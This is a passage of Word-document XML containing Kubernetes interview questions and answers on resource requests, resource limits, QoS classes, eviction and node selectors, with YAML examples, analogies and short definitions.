        <w:br/>
        <w:t xml:space="preserve">  name: my-app</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: app</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">    resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      requests:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        memory: "256Mi"</w:t>
        <w:br/>
        <w:t xml:space="preserve">        cpu: "250m"</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What it means</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * CPU: 250m = 0.25 CPU core</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Memory: 256Mi = 256 MiB RAM guaranteed</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Requests vs Limits</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Requests</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limits</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Meaning</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Minimum guaranteed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Maximum allowed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Used by</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scheduler</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runtime enforcement</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Effect</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Placement decision</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Resource restriction</w:t>
        <w:br/>
        <w:tab/>
        <w:t>If exceeded</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Still allowed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CPU throttling / OOM kill</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How CPU requests work</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * CPU is compressible resource</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Container can use more if available</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Scheduler ensures minimum allocation</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How memory requests work</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Memory is non-compressible</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * If exceeded limit → container may be killed (OOMKilled)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a hotel booking:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Request = minimum room size you need</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Node = hotel room availability</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Scheduler = hotel manager assigning rooms</w:t>
        <w:br/>
        <w:t>You only get a room if your minimum requirement is satisfied.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important concepts</w:t>
        <w:br/>
        <w:t>1. Scheduling decision</w:t>
        <w:br/>
        <w:t>Pods are placed based on requests, not limits</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Node capacity</w:t>
        <w:br/>
        <w:t>Node must have:</w:t>
        <w:br/>
        <w:t>sum(requests of all pods) ≤ node capacity</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. QoS classes (related concept)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Guaranteed (requests = limits)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Burstable (requests &lt; limits)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * BestEffort (no requests)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-world use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Prevent noisy neighbor issues</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Ensure database gets stable memory</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Guarantee minimum performance for APIs</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Optimize cluster utilization</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Always set requests for production workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Estimate based on real usage metrics</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Don’t set too low (causes instability)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Don’t set too high (wastes resources)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Resource requests in Kubernetes define the minimum CPU and memory guaranteed to a container, used by the scheduler to decide node placement, ensuring predictable resource allocation and stable application performance within the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q302. What are resource limits?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Resource Limits in Kubernetes define the maximum amount of CPU and memory a container is allowed to use.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A resource limit is a “hard cap” on how much CPU or memory a container can consume.</w:t>
        <w:br/>
        <w:t>If a container exceeds its limit:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * CPU → it gets throttled</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Memory → it may be terminated (OOMKilled)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why resource limits are used</w:t>
        <w:br/>
        <w:t>They help to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Prevent a single container from consuming all node resources</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Ensure fairness between workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Improve cluster stability</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Protect critical applications from noisy neighbors</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">         1. You define CPU/memory limits in Pod spec</w:t>
        <w:br/>
        <w:t xml:space="preserve">         2. Kubernetes enforces these at runtime</w:t>
        <w:br/>
        <w:t xml:space="preserve">         3. Container usage is restricted based on limits</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example YAML</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Pod</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: my-app</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: app</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">    resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      limits:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        memory: "512Mi"</w:t>
        <w:br/>
        <w:t xml:space="preserve">        cpu: "500m"</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What it means</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * CPU limit: 500m = max 0.5 CPU core</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Memory limit: 512Mi = max RAM allowed</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CPU limits behavior</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * CPU is compressible</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * If usage exceeds limit:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Container is throttled</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Slower performance, but not killed</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Memory limits behavior</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Memory is non-compressible</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * If usage exceeds limit:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Container is killed (OOMKilled)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Restart depends on restart policy</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Requests vs Limits</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Requests</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limits</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Meaning</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Guaranteed minimum</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Maximum allowed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scheduling</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runtime enforcement</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CPU behavior</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Guaranteed share</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Throttled if exceeded</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Memory behavior</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Reserved</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kills if exceeded</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of it like a mobile data plan:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Request = minimum guaranteed speed</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Limit = maximum speed cap</w:t>
        <w:br/>
        <w:t>Even if you try to use more, you cannot exceed the limit.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>QoS classes (important concept)</w:t>
        <w:br/>
        <w:t>1. Guaranteed</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * request = limit (CPU &amp; memory)</w:t>
        <w:br/>
        <w:t>2. Burstable</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * request &lt; limit</w:t>
        <w:br/>
        <w:t>3. BestEffort</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * no requests/limits</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why limits are critical</w:t>
        <w:br/>
        <w:t>Without limits:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * One container can consume all node memory</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Can crash other Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Leads to instability in cluster</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common real-world scenarios</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Web apps with controlled performance usage</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Databases requiring stable memory caps</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Multi-tenant clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Production workloads requiring isolation</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Always set memory limits</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Be careful with CPU limits (can cause throttling spikes)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Monitor actual usage before setting values</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Pair with resource requests for balance</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Resource limits in Kubernetes define the maximum CPU and memory a container is allowed to consume, enforced at runtime to prevent resource overuse, ensure fair allocation across workloads, and maintain cluster stability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q303. Explain QoS classes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: In Kubernetes, QoS (Quality of Service) classes define how Pods are prioritized for resource allocation and eviction under pressure based on their CPU and memory requests and limits.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>QoS class determines how “important” a Pod is when the node runs out of resources.</w:t>
        <w:br/>
        <w:t>Kubernetes uses QoS to decide:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * which Pods get killed first during memory pressure</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * how stable resource guarantees are for a Pod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why QoS classes matter</w:t>
        <w:br/>
        <w:t>They help Kubernetes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Manage resource contention</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Decide eviction order during node pressure</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Ensure critical workloads stay alive</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Improve cluster stability</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The 3 QoS classes</w:t>
        <w:br/>
        <w:t>1. Guaranteed (Highest priority)</w:t>
        <w:br/>
        <w:t>A Pod is Guaranteed when:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * CPU request = CPU limit</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Memory request = Memory limit</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * All containers define both</w:t>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  requests:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cpu: "500m"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    memory: "256Mi"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  limits:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cpu: "500m"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    memory: "256Mi"</w:t>
        <w:br/>
        <w:t>Behavior</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Strongest stability</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Least likely to be evicted</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Reserved resources</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Burstable (Medium priority)</w:t>
        <w:br/>
        <w:t>A Pod is Burstable when:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Requests are defined</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * But requests ≠ limits OR limits are higher</w:t>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  requests:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cpu: "200m"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    memory: "128Mi"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  limits:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cpu: "1"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    memory: "512Mi"</w:t>
        <w:br/>
        <w:t>Behavior</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Gets minimum guaranteed resources</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Can burst beyond request if resources are available</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * May be evicted under pressure (after BestEffort)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. BestEffort (Lowest priority)</w:t>
        <w:br/>
        <w:t>A Pod is BestEffort when:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * No CPU or memory requests or limits defined</w:t>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>containers:</w:t>
        <w:br/>
        <w:t>- name: app</w:t>
        <w:br/>
        <w:t xml:space="preserve">  image: nginx</w:t>
        <w:br/>
        <w:t>Behavior</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * No resource guarantees</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * First to be evicted under pressure</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Uses leftover node resources</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Eviction priority order</w:t>
        <w:br/>
        <w:t>When a node is under memory pressure:</w:t>
        <w:br/>
        <w:t>BestEffort → Burstable → Guaranteed</w:t>
        <w:br/>
        <w:t>Guaranteed Pods are the safest.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a flight boarding system:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Guaranteed = Business class (reserved seat, priority boarding)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Burstable = Economy with extra baggage allowance (flexible)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * BestEffort = Standby ticket (last to board, may be denied)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why QoS is important</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Ensures critical apps (databases, APIs) stay running</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Prevents resource starvation</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Helps kubelet make eviction decisions</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Stabilizes cluster under load</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key internal usage</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kubelet uses QoS to choose eviction victims</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * OOM (Out Of Memory) killer prioritizes BestEffort first</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Scheduler uses requests, but eviction uses QoS class</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Always set requests for production workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Avoid BestEffort in production</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Use Guaranteed for critical systems (DBs, core APIs)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Use Burstable for general workloads</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>QoS classes in Kubernetes define how Pods are categorized (Guaranteed, Burstable, BestEffort) based on their resource requests and limits, determining their priority during scheduling stability and eviction under resource pressure, with Guaranteed Pods being most protected and BestEffort Pods being the first to be evicted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q304. What is eviction?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: In Kubernetes, eviction is the process of removing Pods from a node when the node is under resource pressure or administrative action, so that the cluster remains healthy and stable.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Eviction = Kubernetes forcefully removing a Pod to free up resources or maintain node stability.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why eviction happens</w:t>
        <w:br/>
        <w:t>Kubernetes evicts Pods when a node is facing issues like:</w:t>
        <w:br/>
        <w:t>1. Resource pressure</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Memory pressure (most common)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Disk pressure</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * CPU contention (indirectly)</w:t>
        <w:br/>
        <w:t>2. Node maintenance</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kubectl drain operation</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Cluster upgrades</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Node scaling down (Cluster Autoscaler)</w:t>
        <w:br/>
        <w:t>3. Policy-based eviction</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Pod Disruption Budget (PDB) restrictions</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * System priority decisions</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How eviction works</w:t>
        <w:br/>
        <w:t xml:space="preserve">         1. kubelet monitors node health</w:t>
        <w:br/>
        <w:t xml:space="preserve">         2. Detects resource pressure</w:t>
        <w:br/>
        <w:t xml:space="preserve">         3. Selects Pods based on priority (QoS, PDB, priority class)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         4. Sends eviction request</w:t>
        <w:br/>
        <w:t xml:space="preserve">         5. Pod is gracefully terminated (if possible)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         6. Controller (Deployment/ReplicaSet) recreates Pod elsewhere</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Eviction flow</w:t>
        <w:br/>
        <w:t>Node Pressure → kubelet → Select Pod → Evict Pod → Scheduler places new Pod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Eviction vs deletion</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Eviction</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Deletion</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Initiated by</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kubelet / system</w:t>
        <w:br/>
        <w:tab/>
        <w:t>user / API</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Resource management</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Manual removal</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Behavior</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Reschedules Pod</w:t>
        <w:br/>
        <w:tab/>
        <w:t>May or may not reschedule</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Awareness of PDB</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Priority order of eviction</w:t>
        <w:br/>
        <w:t>When resources are low, Kubernetes evicts in this order:</w:t>
        <w:br/>
        <w:t>BestEffort → Burstable → Guaranteed</w:t>
        <w:br/>
        <w:t>(From least important to most important Pods)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Role of Pod Disruption Budget (PDB)</w:t>
        <w:br/>
        <w:t>Before eviction:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kubernetes checks PDB rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * If violating minAvailable/maxUnavailable → eviction is blocked</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example scenario</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Node memory is full</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * System needs to free space</w:t>
        <w:br/>
        <w:t>Kubernetes will:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         1. Evict BestEffort Pods first</w:t>
        <w:br/>
        <w:t xml:space="preserve">         2. Then Burstable Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">         3. Avoid Guaranteed Pods unless necessary</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a train:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Train = node</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Passengers = Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Eviction = removing passengers when train is overcrowded</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * VIP passengers (Guaranteed QoS) are removed last (or not at all)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of eviction</w:t>
        <w:br/>
        <w:t>1. Soft eviction</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Graceful shutdown</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * SIGTERM sent</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Grace period allowed</w:t>
        <w:br/>
        <w:t>2. Hard eviction</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Immediate removal (rare)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * SIGKILL after timeout</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common tools triggering eviction</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kubelet (resource pressure)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Cluster Autoscaler (scale down nodes)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kubectl drain (maintenance)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * PDB controller (protects from too many evictions)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Always set resource requests and limits</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Use PDB for critical apps</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Avoid BestEffort in production</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Monitor node memory/disk pressure</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Eviction in Kubernetes is the controlled removal of Pods from a node triggered by resource pressure or maintenance operations, where kubelet selects Pods based on priority, QoS class, and Pod Disruption Budgets to maintain node stability and ensure efficient resource utilization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q305. Explain node selectors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: In Kubernetes, Node Selectors are a simple scheduling mechanism that forces a Pod to run only on nodes with specific labels.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>NodeSelector tells Kubernetes: “Run this Pod only on nodes that match these labels.”</w:t>
        <w:br/>
        <w:t>It is the most basic way to control where Pods are scheduled.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why node selectors are used</w:t>
        <w:br/>
        <w:t>They help to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Place workloads on specific hardware (GPU, SSD, high-memory nodes)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Separate workloads (dev vs prod nodes)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Control cost (use cheaper nodes for batch jobs)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Improve performance by targeting suitable nodes</w:t>
